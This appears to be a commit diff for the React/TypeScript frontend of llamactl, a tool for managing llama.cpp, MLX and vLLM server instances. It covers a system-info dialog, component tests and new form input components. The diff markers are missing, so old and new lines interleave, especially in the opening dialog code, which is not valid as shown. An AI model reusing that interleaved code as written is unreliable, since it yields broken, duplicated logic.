setBackendInfo(null)
setError(null)
return
}
setLoading(true)
setError(null)
try {
const [version, devices, help] = await Promise.all([
serverApi.getVersion(),
serverApi.getDevices(),
serverApi.getHelp()
])
setSystemInfo({ version, devices, help })
setBackendInfo({ version, devices, help })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to fetch system info')
setError(err instanceof Error ? err.message : 'Failed to fetch backend info')
} finally {
setLoading(false)
}
}
// Load data when dialog opens
// Load data when dialog opens or backend changes
useEffect(() => {
if (open) {
fetchSystemInfo()
void fetchBackendInfo(selectedBackend)
}
}, [open])
}, [open, selectedBackend])
const handleBackendChange = (value: string) => {
setSelectedBackend(value as BackendTypeValue)
setShowHelp(false) // Reset help section when switching backends
}
const renderBackendSpecificContent = () => {
if (selectedBackend !== BackendType.LLAMA_CPP) {
return (
<div className="flex items-center justify-center py-8">
<div className="text-center space-y-3">
<Info className="h-8 w-8 text-gray-400 mx-auto" />
<div>
<h3 className="font-semibold text-gray-700">Backend Info Not Available</h3>
<p className="text-sm text-gray-500 mt-1">
Information for {BACKEND_OPTIONS.find(b => b.value === selectedBackend)?.label} backend is not yet implemented.
</p>
</div>
</div>
</div>
)
}
if (loading && !backendInfo) {
return (
<div className="flex items-center justify-center py-8">
<Loader2 className="h-6 w-6 animate-spin text-gray-400" />
<span className="ml-2 text-gray-400">Loading backend information...</span>
</div>
)
}
if (error) {
return (
<div className="flex items-center gap-2 p-4 bg-destructive/10 border border-destructive/20 rounded-lg">
<AlertCircle className="h-4 w-4 text-destructive" />
<span className="text-sm text-destructive">{error}</span>
</div>
)
}
if (!backendInfo) {
return null
}
return (
<div className="space-y-6">
{/* Backend Version Section */}
<div className="space-y-3">
<h3 className="font-semibold">
{BACKEND_OPTIONS.find(b => b.value === selectedBackend)?.label} Version
</h3>
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --version</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{backendInfo.version}
</pre>
</div>
</div>
{/* Devices Section */}
<div className="space-y-3">
<div className="flex items-center gap-2">
<h3 className="font-semibold">Available Devices</h3>
</div>
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --list-devices</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{backendInfo.devices}
</pre>
</div>
</div>
{/* Help Section */}
<div className="space-y-3">
<Button
variant="ghost"
onClick={() => setShowHelp(!showHelp)}
className="flex items-center gap-2 p-0 h-auto font-semibold"
>
{showHelp ? (
<ChevronDown className="h-4 w-4" />
) : (
<ChevronRight className="h-4 w-4" />
)}
<HelpCircle className="h-4 w-4" />
Command Line Options
</Button>
{showHelp && (
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --help</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono max-h-64 overflow-y-auto">
{backendInfo.help}
</pre>
</div>
)}
</div>
</div>
)
}
return (
<Dialog open={open} onOpenChange={onOpenChange} >
<Dialog open={open} onOpenChange={onOpenChange}>
<DialogContent className="sm:max-w-4xl max-w-[calc(100%-2rem)] max-h-[80vh] flex flex-col">
<DialogHeader>
<div className="flex items-center justify-between">
<div>
<DialogTitle className="flex items-center gap-2">
<Monitor className="h-5 w-5" />
System Information
</DialogTitle>
<DialogDescription>
Llama.cpp server environment and capabilities
</DialogDescription>
</div>
<Button
variant="outline"
size="sm"
onClick={fetchSystemInfo}
disabled={loading}
>
{loading ? (
<Loader2 className="h-4 w-4 animate-spin" />
) : (
<RefreshCw className="h-4 w-4" />
)}
</Button>
</div>
<DialogTitle className="flex items-center gap-2">
<Monitor className="h-5 w-5" />
System Information
</DialogTitle>
<DialogDescription>
View system and backend-specific environment and capabilities
</DialogDescription>
</DialogHeader>
<div className="flex-1 overflow-y-auto">
{loading && !systemInfo ? (
<div className="flex items-center justify-center py-12">
<Loader2 className="h-6 w-6 animate-spin text-gray-400" />
<span className="ml-2 text-gray-400">Loading system information...</span>
<div className="space-y-6">
{/* Llamactl Version Section - Always shown */}
<div className="space-y-3">
<h3 className="font-semibold">Llamactl Version</h3>
<div className="bg-gray-900 rounded-lg p-4">
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{getAppVersion()}
</pre>
</div>
</div>
) : error ? (
<div className="flex items-center gap-2 p-4 bg-destructive/10 border border-destructive/20 rounded-lg">
<AlertCircle className="h-4 w-4 text-destructive" />
<span className="text-sm text-destructive">{error}</span>
</div>
) : systemInfo ? (
<div className="space-y-6">
{/* Llamactl Version Section */}
<div className="space-y-3">
<h3 className="font-semibold">Llamactl Version</h3>
<div className="bg-gray-900 rounded-lg p-4">
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{getAppVersion()}
</pre>
</div>
</div>
{/* Llama Server Version Section */}
<div className="space-y-3">
<h3 className="font-semibold">Llama Server Version</h3>
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --version</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{systemInfo.version}
</pre>
{/* Backend Selection Section */}
<div className="space-y-3">
<h3 className="font-semibold">Backend Information</h3>
<div className="flex items-center gap-3">
<div className="flex-1">
<SelectInput
id="backend-select"
label=""
value={selectedBackend}
onChange={(value) => handleBackendChange(value || BackendType.LLAMA_CPP)}
options={BACKEND_OPTIONS}
className="text-sm"
/>
</div>
</div>
{/* Devices Section */}
<div className="space-y-3">
<div className="flex items-center gap-2">
<h3 className="font-semibold">Available Devices</h3>
</div>
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --list-devices</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{systemInfo.devices}
</pre>
</div>
</div>
{/* Help Section */}
<div className="space-y-3">
<Button
variant="ghost"
onClick={() => setShowHelp(!showHelp)}
className="flex items-center gap-2 p-0 h-auto font-semibold"
>
{showHelp ? (
<ChevronDown className="h-4 w-4" />
) : (
<ChevronRight className="h-4 w-4" />
)}
<HelpCircle className="h-4 w-4" />
Command Line Options
</Button>
{showHelp && (
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">
<span className="text-sm text-gray-400">$ llama-server --help</span>
</div>
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono max-h-64 overflow-y-auto">
{systemInfo.help}
</pre>
</div>
{selectedBackend === BackendType.LLAMA_CPP && (
<Button
variant="outline"
size="sm"
onClick={() => void fetchBackendInfo(selectedBackend)}
disabled={loading}
>
{loading ? (
<Loader2 className="h-4 w-4 animate-spin" />
) : (
<RefreshCw className="h-4 w-4" />
)}
</Button>
)}
</div>
</div>
) : null}
{/* Backend-specific content */}
{renderBackendSpecificContent()}
</div>
</div>
<DialogFooter>

View File

@@ -3,6 +3,7 @@ import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import InstanceCard from '@/components/InstanceCard'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
// Mock the health hook since we're not testing health logic here
vi.mock('@/hooks/useInstanceHealth', () => ({
@@ -17,14 +18,14 @@ describe('InstanceCard - Instance Actions and State', () => {
const stoppedInstance: Instance = {
name: 'test-instance',
running: false,
options: { model: 'test-model.gguf' }
status: 'stopped',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'test-model.gguf' } }
}
const runningInstance: Instance = {
name: 'running-instance',
running: true,
options: { model: 'running-model.gguf' }
status: 'running',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'running-model.gguf' } }
}
beforeEach(() => {
@@ -101,7 +102,7 @@ afterEach(() => {
it('opens logs dialog when logs button clicked', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={stoppedInstance}
@@ -112,9 +113,13 @@ afterEach(() => {
/>
)
// First click "More actions" to reveal the logs button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
const logsButton = screen.getByTitle('View logs')
await user.click(logsButton)
// Should open logs dialog (we can verify this by checking if dialog title appears)
expect(screen.getByText(`Logs: ${stoppedInstance.name}`)).toBeInTheDocument()
})
@@ -124,7 +129,7 @@ afterEach(() => {
it('shows confirmation dialog and calls deleteInstance when confirmed', async () => {
const user = userEvent.setup()
const confirmSpy = vi.spyOn(window, 'confirm').mockReturnValue(true)
render(
<InstanceCard
instance={stoppedInstance}
@@ -135,19 +140,23 @@ afterEach(() => {
/>
)
// First click "More actions" to reveal the delete button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
const deleteButton = screen.getByTitle('Delete instance')
await user.click(deleteButton)
expect(confirmSpy).toHaveBeenCalledWith('Are you sure you want to delete instance "test-instance"?')
expect(mockDeleteInstance).toHaveBeenCalledWith('test-instance')
confirmSpy.mockRestore()
})
it('does not call deleteInstance when confirmation cancelled', async () => {
const user = userEvent.setup()
const confirmSpy = vi.spyOn(window, 'confirm').mockReturnValue(false)
render(
<InstanceCard
instance={stoppedInstance}
@@ -158,18 +167,24 @@ afterEach(() => {
/>
)
// First click "More actions" to reveal the delete button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
const deleteButton = screen.getByTitle('Delete instance')
await user.click(deleteButton)
expect(confirmSpy).toHaveBeenCalled()
expect(mockDeleteInstance).not.toHaveBeenCalled()
confirmSpy.mockRestore()
})
})
describe('Button State Based on Instance Status', () => {
it('disables start button and enables stop button for running instance', () => {
it('disables start button and enables stop button for running instance', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={runningInstance}
@@ -180,12 +195,19 @@ afterEach(() => {
/>
)
expect(screen.getByTitle('Start instance')).toBeDisabled()
expect(screen.queryByTitle('Start instance')).not.toBeInTheDocument()
expect(screen.getByTitle('Stop instance')).not.toBeDisabled()
// Expand more actions to access delete button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
expect(screen.getByTitle('Delete instance')).toBeDisabled() // Can't delete running instance
})
it('enables start button and disables stop button for stopped instance', () => {
it('enables start button and disables stop button for stopped instance', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={stoppedInstance}
@@ -197,11 +219,18 @@ afterEach(() => {
)
expect(screen.getByTitle('Start instance')).not.toBeDisabled()
expect(screen.getByTitle('Stop instance')).toBeDisabled()
expect(screen.queryByTitle('Stop instance')).not.toBeInTheDocument()
// Expand more actions to access delete button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
expect(screen.getByTitle('Delete instance')).not.toBeDisabled() // Can delete stopped instance
})
it('edit and logs buttons are always enabled', () => {
it('edit and logs buttons are always enabled', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={runningInstance}
@@ -213,6 +242,11 @@ afterEach(() => {
)
expect(screen.getByTitle('Edit instance')).not.toBeDisabled()
// Expand more actions to access logs button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
expect(screen.getByTitle('View logs')).not.toBeDisabled()
})
})
@@ -267,7 +301,7 @@ afterEach(() => {
describe('Integration with LogsModal', () => {
it('passes correct props to LogsModal', async () => {
const user = userEvent.setup()
render(
<InstanceCard
instance={runningInstance}
@@ -278,20 +312,24 @@ afterEach(() => {
/>
)
// First click "More actions" to reveal the logs button
const moreActionsButton = screen.getByTitle('More actions')
await user.click(moreActionsButton)
// Open logs dialog
await user.click(screen.getByTitle('View logs'))
// Verify dialog opened with correct instance data
expect(screen.getByText('Logs: running-instance')).toBeInTheDocument()
// Close dialog to test close functionality
const closeButtons = screen.getAllByText('Close')
const dialogCloseButton = closeButtons.find(button =>
const dialogCloseButton = closeButtons.find(button =>
button.closest('[data-slot="dialog-content"]')
)
expect(dialogCloseButton).toBeTruthy()
await user.click(dialogCloseButton!)
// Modal should close
expect(screen.queryByText('Logs: running-instance')).not.toBeInTheDocument()
})
@@ -301,7 +339,7 @@ afterEach(() => {
it('handles instance with minimal data', () => {
const minimalInstance: Instance = {
name: 'minimal',
running: false,
status: 'stopped',
options: {}
}
@@ -323,7 +361,7 @@ afterEach(() => {
it('handles instance with undefined options', () => {
const instanceWithoutOptions: Instance = {
name: 'no-options',
running: true,
status: 'running',
options: undefined
}

View File

@@ -5,6 +5,7 @@ import InstanceList from '@/components/InstanceList'
import { InstancesProvider } from '@/contexts/InstancesContext'
import { instancesApi } from '@/lib/api'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { AuthProvider } from '@/contexts/AuthContext'
// Mock the API
@@ -44,9 +45,9 @@ describe('InstanceList - State Management and UI Logic', () => {
const mockEditInstance = vi.fn()
const mockInstances: Instance[] = [
{ name: 'instance-1', running: false, options: { model: 'model1.gguf' } },
{ name: 'instance-2', running: true, options: { model: 'model2.gguf' } },
{ name: 'instance-3', running: false, options: { model: 'model3.gguf' } }
{ name: 'instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
{ name: 'instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } },
{ name: 'instance-3', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model3.gguf' } } }
]
const DUMMY_API_KEY = 'test-api-key-123'

View File

@@ -3,6 +3,7 @@ import { render, screen, waitFor } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import InstanceDialog from '@/components/InstanceDialog'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
describe('InstanceModal - Form Logic and Validation', () => {
const mockOnSave = vi.fn()
@@ -91,6 +92,7 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('my-instance', {
auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP
})
})
@@ -134,10 +136,10 @@ afterEach(() => {
describe('Edit Mode', () => {
const mockInstance: Instance = {
name: 'existing-instance',
running: false,
status: 'stopped',
options: {
model: 'test-model.gguf',
gpu_layers: 10,
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
auto_restart: false
}
}
@@ -177,15 +179,15 @@ afterEach(() => {
await user.click(screen.getByTestId('dialog-save-button'))
expect(mockOnSave).toHaveBeenCalledWith('existing-instance', {
model: 'test-model.gguf',
gpu_layers: 10,
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
auto_restart: false
})
})
it('shows correct button text for running vs stopped instances', () => {
const runningInstance: Instance = { ...mockInstance, running: true }
const runningInstance: Instance = { ...mockInstance, status: 'running' }
const { rerender } = render(
<InstanceDialog
open={true}
@@ -271,35 +273,13 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('test-instance', {
auto_restart: true,
backend_type: BackendType.LLAMA_CPP,
max_restarts: 5,
restart_delay: 10
})
})
})
describe('Advanced Fields Toggle', () => {
it('shows advanced fields when toggle clicked', async () => {
const user = userEvent.setup()
render(
<InstanceDialog
open={true}
onOpenChange={mockOnOpenChange}
onSave={mockOnSave}
/>
)
// Advanced fields should be hidden initially
expect(screen.queryByText(/Advanced Configuration/)).toBeInTheDocument()
// Click to expand
await user.click(screen.getByText(/Advanced Configuration/))
// Should show more configuration options
// Note: Specific fields depend on zodFormUtils configuration
// We're testing the toggle behavior, not specific fields
})
})
describe('Form Data Handling', () => {
it('cleans up undefined values before submission', async () => {
@@ -321,6 +301,7 @@ afterEach(() => {
// Should only include non-empty values
expect(mockOnSave).toHaveBeenCalledWith('clean-instance', {
auto_restart: true, // Only this default value should be included
backend_type: BackendType.LLAMA_CPP
})
})
@@ -345,7 +326,8 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('numeric-test', {
auto_restart: true,
gpu_layers: 15, // Should be number, not string
backend_type: BackendType.LLAMA_CPP,
backend_options: { gpu_layers: 15 }, // Should be number, not string
})
})
})

View File

@@ -0,0 +1,62 @@
import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
interface ArrayInputProps {
id: string
label: string
value: string[] | undefined
onChange: (value: string[] | undefined) => void
placeholder?: string
description?: string
disabled?: boolean
className?: string
}
const ArrayInput: React.FC<ArrayInputProps> = ({
id,
label,
value,
onChange,
placeholder = "item1, item2, item3",
description,
disabled = false,
className
}) => {
const handleChange = (inputValue: string) => {
if (inputValue === '') {
onChange(undefined)
return
}
const arrayValue = inputValue
.split(',')
.map(s => s.trim())
.filter(Boolean)
onChange(arrayValue.length > 0 ? arrayValue : undefined)
}
return (
<div className="grid gap-2">
<Label htmlFor={id}>
{label}
</Label>
<Input
id={id}
type="text"
value={Array.isArray(value) ? value.join(', ') : ''}
onChange={(e) => handleChange(e.target.value)}
placeholder={placeholder}
disabled={disabled}
className={className}
/>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
<p className="text-xs text-muted-foreground">Separate multiple values with commas</p>
</div>
)
}
export default ArrayInput

View File

@@ -0,0 +1,42 @@
import React from 'react'
import { Checkbox } from '@/components/ui/checkbox'
import { Label } from '@/components/ui/label'
interface CheckboxInputProps {
id: string
label: string
value: boolean | undefined
onChange: (value: boolean) => void
description?: string
disabled?: boolean
className?: string
}
const CheckboxInput: React.FC<CheckboxInputProps> = ({
id,
label,
value,
onChange,
description,
disabled = false,
className
}) => {
return (
<div className={`flex items-center space-x-2 ${className || ''}`}>
<Checkbox
id={id}
checked={value === true}
onCheckedChange={(checked) => onChange(!!checked)}
disabled={disabled}
/>
<Label htmlFor={id} className="text-sm font-normal">
{label}
{description && (
<span className="text-muted-foreground ml-1">- {description}</span>
)}
</Label>
</div>
)
}
export default CheckboxInput

View File

@@ -0,0 +1,144 @@
import React, { useState } from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
import { Button } from '@/components/ui/button'
import { X, Plus } from 'lucide-react'
interface EnvironmentVariablesInputProps {
id: string
label: string
value: Record<string, string> | undefined
onChange: (value: Record<string, string> | undefined) => void
description?: string
disabled?: boolean
className?: string
}
interface EnvVar {
key: string
value: string
}
const EnvironmentVariablesInput: React.FC<EnvironmentVariablesInputProps> = ({
id,
label,
value,
onChange,
description,
disabled = false,
className
}) => {
// Convert the value object to an array of key-value pairs for editing
const envVarsFromValue = value
? Object.entries(value).map(([key, val]) => ({ key, value: val }))
: []
const [envVars, setEnvVars] = useState<EnvVar[]>(
envVarsFromValue.length > 0 ? envVarsFromValue : [{ key: '', value: '' }]
)
// Update parent component when env vars change
const updateParent = (newEnvVars: EnvVar[]) => {
// Filter out empty entries
const validVars = newEnvVars.filter(env => env.key.trim() !== '' && env.value.trim() !== '')
if (validVars.length === 0) {
onChange(undefined)
} else {
const envObject = validVars.reduce((acc, env) => {
acc[env.key.trim()] = env.value.trim()
return acc
}, {} as Record<string, string>)
onChange(envObject)
}
}
const handleKeyChange = (index: number, newKey: string) => {
const newEnvVars = [...envVars]
newEnvVars[index].key = newKey
setEnvVars(newEnvVars)
updateParent(newEnvVars)
}
const handleValueChange = (index: number, newValue: string) => {
const newEnvVars = [...envVars]
newEnvVars[index].value = newValue
setEnvVars(newEnvVars)
updateParent(newEnvVars)
}
const addEnvVar = () => {
const newEnvVars = [...envVars, { key: '', value: '' }]
setEnvVars(newEnvVars)
}
const removeEnvVar = (index: number) => {
if (envVars.length === 1) {
// Reset to empty if it's the last one
const newEnvVars = [{ key: '', value: '' }]
setEnvVars(newEnvVars)
updateParent(newEnvVars)
} else {
const newEnvVars = envVars.filter((_, i) => i !== index)
setEnvVars(newEnvVars)
updateParent(newEnvVars)
}
}
return (
<div className={`grid gap-2 ${className || ''}`}>
<Label htmlFor={id}>
{label}
</Label>
<div className="space-y-2">
{envVars.map((envVar, index) => (
<div key={index} className="flex gap-2 items-center">
<Input
placeholder="Variable name"
value={envVar.key}
onChange={(e) => handleKeyChange(index, e.target.value)}
disabled={disabled}
className="flex-1"
/>
<Input
placeholder="Variable value"
value={envVar.value}
onChange={(e) => handleValueChange(index, e.target.value)}
disabled={disabled}
className="flex-1"
/>
<Button
type="button"
variant="outline"
size="sm"
onClick={() => removeEnvVar(index)}
disabled={disabled}
className="shrink-0"
>
<X className="h-4 w-4" />
</Button>
</div>
))}
<Button
type="button"
variant="outline"
size="sm"
onClick={addEnvVar}
disabled={disabled}
className="w-fit"
>
<Plus className="h-4 w-4 mr-2" />
Add Variable
</Button>
</div>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
<p className="text-xs text-muted-foreground">
Environment variables that will be passed to the backend process
</p>
</div>
)
}
export default EnvironmentVariablesInput

View File

@@ -0,0 +1,60 @@
import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
interface NumberInputProps {
id: string
label: string
value: number | undefined
onChange: (value: number | undefined) => void
placeholder?: string
description?: string
disabled?: boolean
className?: string
}
const NumberInput: React.FC<NumberInputProps> = ({
id,
label,
value,
onChange,
placeholder,
description,
disabled = false,
className
}) => {
const handleChange = (inputValue: string) => {
if (inputValue === '') {
onChange(undefined)
return
}
const numValue = parseFloat(inputValue)
if (!isNaN(numValue)) {
onChange(numValue)
}
}
return (
<div className="grid gap-2">
<Label htmlFor={id}>
{label}
</Label>
<Input
id={id}
type="number"
step="any"
value={value !== undefined ? value : ''}
onChange={(e) => handleChange(e.target.value)}
placeholder={placeholder}
disabled={disabled}
className={className}
/>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
</div>
)
}
export default NumberInput

View File

@@ -0,0 +1,55 @@
import React from 'react'
import { Label } from '@/components/ui/label'
interface SelectOption {
value: string
label: string
}
interface SelectInputProps {
id: string
label: string
value: string | undefined
onChange: (value: string | undefined) => void
options: SelectOption[]
description?: string
disabled?: boolean
className?: string
}
const SelectInput: React.FC<SelectInputProps> = ({
id,
label,
value,
onChange,
options,
description,
disabled = false,
className
}) => {
return (
<div className="grid gap-2">
<Label htmlFor={id}>
{label}
</Label>
<select
id={id}
value={value || ''}
onChange={(e) => onChange(e.target.value || undefined)}
disabled={disabled}
className={`flex h-10 w-full rounded-md border border-input bg-background px-3 py-2 text-sm ring-offset-background focus-visible:outline-none focus-visible:ring-2 focus-visible:ring-ring focus-visible:ring-offset-2 disabled:cursor-not-allowed disabled:opacity-50 ${className || ''}`}
>
{options.map(option => (
<option key={option.value} value={option.value}>
{option.label}
</option>
))}
</select>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
</div>
)
}
export default SelectInput

View File

@@ -0,0 +1,47 @@
import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
interface TextInputProps {
id: string
label: string
value: string | number | undefined
onChange: (value: string | undefined) => void
placeholder?: string
description?: string
disabled?: boolean
className?: string
}
const TextInput: React.FC<TextInputProps> = ({
id,
label,
value,
onChange,
placeholder,
description,
disabled = false,
className
}) => {
return (
<div className="grid gap-2">
<Label htmlFor={id}>
{label}
</Label>
<Input
id={id}
type="text"
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => onChange(e.target.value || undefined)}
placeholder={placeholder}
disabled={disabled}
className={className}
/>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
</div>
)
}
export default TextInput

View File

@@ -0,0 +1,53 @@
import React from 'react'
import type { CreateInstanceOptions } from '@/types/instance'
import CheckboxInput from '@/components/form/CheckboxInput'
import NumberInput from '@/components/form/NumberInput'
interface AutoRestartConfigurationProps {
formData: CreateInstanceOptions
onChange: (key: keyof CreateInstanceOptions, value: any) => void
}
const AutoRestartConfiguration: React.FC<AutoRestartConfigurationProps> = ({
formData,
onChange
}) => {
const isAutoRestartEnabled = formData.auto_restart === true
return (
<div className="space-y-4">
<h3 className="text-lg font-medium">Auto Restart Configuration</h3>
<CheckboxInput
id="auto_restart"
label="Auto Restart"
value={formData.auto_restart}
onChange={(value) => onChange('auto_restart', value)}
description="Automatically restart the instance on failure"
/>
{isAutoRestartEnabled && (
<div className="ml-6 space-y-4 border-l-2 border-muted pl-4">
<NumberInput
id="max_restarts"
label="Max Restarts"
value={formData.max_restarts}
onChange={(value) => onChange('max_restarts', value)}
placeholder="3"
description="Maximum number of restart attempts (0 = unlimited)"
/>
<NumberInput
id="restart_delay"
label="Restart Delay (seconds)"
value={formData.restart_delay}
onChange={(value) => onChange('restart_delay', value)}
placeholder="5"
description="Delay in seconds before attempting restart"
/>
</div>
)}
</div>
)
}
export default AutoRestartConfiguration

View File

@@ -0,0 +1,54 @@
import React from 'react'
import type { CreateInstanceOptions } from '@/types/instance'
import { getBasicBackendFields, getAdvancedBackendFields } from '@/lib/zodFormUtils'
import BackendFormField from '@/components/BackendFormField'
interface BackendConfigurationProps {
formData: CreateInstanceOptions
onBackendFieldChange: (key: string, value: any) => void
showAdvanced?: boolean
}
const BackendConfiguration: React.FC<BackendConfigurationProps> = ({
formData,
onBackendFieldChange,
showAdvanced = false
}) => {
const basicBackendFields = getBasicBackendFields(formData.backend_type)
const advancedBackendFields = getAdvancedBackendFields(formData.backend_type)
return (
<div className="space-y-4">
<h3 className="text-lg font-medium">Backend Configuration</h3>
{/* Basic backend fields */}
{basicBackendFields.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={(formData.backend_options as any)?.[fieldKey]}
onChange={onBackendFieldChange}
/>
))}
{/* Advanced backend fields */}
{showAdvanced && advancedBackendFields.length > 0 && (
<div className="space-y-4 pl-6 border-l-2 border-muted">
<h4 className="text-md font-medium">Advanced Backend Configuration</h4>
{advancedBackendFields
.sort()
.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={(formData.backend_options as any)?.[fieldKey]}
onChange={onBackendFieldChange}
/>
))}
</div>
)}
</div>
)
}
export default BackendConfiguration

View File

@@ -0,0 +1,117 @@
import React, { useState } from 'react'
import { BackendType, type CreateInstanceOptions } from '@/types/instance'
import { Card, CardContent, CardHeader, CardTitle } from '@/components/ui/card'
import { Button } from '@/components/ui/button'
import { Terminal, ChevronDown, ChevronRight } from 'lucide-react'
import { getBasicBackendFields, getAdvancedBackendFields } from '@/lib/zodFormUtils'
import BackendFormField from '@/components/BackendFormField'
import SelectInput from '@/components/form/SelectInput'
interface BackendConfigurationCardProps {
formData: CreateInstanceOptions
onBackendFieldChange: (key: string, value: unknown) => void
onChange: (key: keyof CreateInstanceOptions, value: unknown) => void
onParseCommand: () => void
}
const BackendConfigurationCard: React.FC<BackendConfigurationCardProps> = ({
formData,
onBackendFieldChange,
onChange,
onParseCommand
}) => {
const [showAdvanced, setShowAdvanced] = useState(false)
const basicBackendFields = getBasicBackendFields(formData.backend_type)
const advancedBackendFields = getAdvancedBackendFields(formData.backend_type)
return (
<Card>
<CardHeader>
<CardTitle>Backend Configuration</CardTitle>
</CardHeader>
<CardContent className="space-y-6">
{/* Backend Type Selection */}
<SelectInput
id="backend_type"
label="Backend Type"
value={formData.backend_type || BackendType.LLAMA_CPP}
onChange={(value) => onChange('backend_type', value)}
options={[
{ value: BackendType.LLAMA_CPP, label: 'Llama Server' },
{ value: BackendType.MLX_LM, label: 'MLX LM' },
{ value: BackendType.VLLM, label: 'vLLM' }
]}
description="Select the backend server type"
/>
{/* Parse Command Section */}
<div className="flex flex-col gap-2">
<Button
variant="outline"
onClick={onParseCommand}
className="flex items-center gap-2 w-fit"
>
<Terminal className="h-4 w-4" />
Parse Command
</Button>
<p className="text-sm text-muted-foreground">
Import settings from your backend command
</p>
</div>
{/* Basic Backend Options */}
{basicBackendFields.length > 0 && (
<div className="space-y-4">
<h3 className="text-md font-medium">Basic Backend Options</h3>
{basicBackendFields.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={(formData.backend_options as Record<string, unknown>)?.[fieldKey] as string | number | boolean | string[] | undefined}
onChange={onBackendFieldChange}
/>
))}
</div>
)}
{/* Advanced Backend Options */}
{advancedBackendFields.length > 0 && (
<div className="space-y-4">
<Button
variant="ghost"
onClick={() => setShowAdvanced(!showAdvanced)}
className="flex items-center gap-2 p-0 h-auto font-medium"
>
{showAdvanced ? (
<ChevronDown className="h-4 w-4" />
) : (
<ChevronRight className="h-4 w-4" />
)}
Advanced Backend Options
<span className="text-muted-foreground text-sm font-normal">
({advancedBackendFields.length} options)
</span>
</Button>
{showAdvanced && (
<div className="space-y-4 pl-6 border-l-2 border-muted">
{advancedBackendFields
.sort()
.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={(formData.backend_options as Record<string, unknown>)?.[fieldKey] as string | number | boolean | string[] | undefined}
onChange={onBackendFieldChange}
/>
))}
</div>
)}
</div>
)}
</CardContent>
</Card>
)
}
export default BackendConfigurationCard

View File

@@ -0,0 +1,93 @@
import React from 'react'
import type { CreateInstanceOptions } from '@/types/instance'
import { Card, CardContent, CardHeader, CardTitle } from '@/components/ui/card'
import { Label } from '@/components/ui/label'
import { Input } from '@/components/ui/input'
import AutoRestartConfiguration from '@/components/instance/AutoRestartConfiguration'
import NumberInput from '@/components/form/NumberInput'
import CheckboxInput from '@/components/form/CheckboxInput'
import EnvironmentVariablesInput from '@/components/form/EnvironmentVariablesInput'
interface InstanceSettingsCardProps {
instanceName: string
nameError: string
isEditing: boolean
formData: CreateInstanceOptions
onNameChange: (name: string) => void
onChange: (key: keyof CreateInstanceOptions, value: unknown) => void
}
const InstanceSettingsCard: React.FC<InstanceSettingsCardProps> = ({
instanceName,
nameError,
isEditing,
formData,
onNameChange,
onChange
}) => {
return (
<Card>
<CardHeader>
<CardTitle>Instance Settings</CardTitle>
</CardHeader>
<CardContent className="space-y-6">
{/* Instance Name */}
<div className="grid gap-2">
<Label htmlFor="name">
Instance Name <span className="text-red-500">*</span>
</Label>
